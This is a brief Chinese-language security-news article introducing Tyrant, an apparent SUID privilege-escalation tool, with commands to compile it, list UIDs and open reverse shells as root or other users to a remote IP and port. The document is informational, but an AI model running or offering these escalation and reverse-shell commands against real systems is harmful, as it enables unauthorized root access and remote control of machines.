FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

Tyrant 是一个 SUID 二进制特权升级工具，权限提升或进行横向移动。

用法

使用以下命令编译源代码：

$ gcc tyrant.c -o tyrant

要显示帮助信息，请使用：

$ ./tyrant -h

获取 UID

只需在没有任何参数的情况下运行该工具，即可列出当前用户的 UID 及其他用户详细信息：

$ ./tyrant

指定 UID 进行反向 Shell：根权限

**注意：**如果你尝试以低权限用户身份启动反向 Shell，将会失败。你必须结合 Tyrant 利用其他漏洞。

要以根权限启动反向 Shell，请执行：

# ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443

执行后，Tyrant 将自动设置 SUID 位，允许低权限用户执行根权限升级操作。例如：

$ ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443

指定其他 UID

你还可以通过指定另一个 UID 切换到不同的用户：

# ./tyrant -uid 33 -rhost 192.168.176.129 -rport 443

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

本文为 独立观点，未经允许不得转载，授权请联系FreeBuf客服小蜜蜂，微信：freebee2022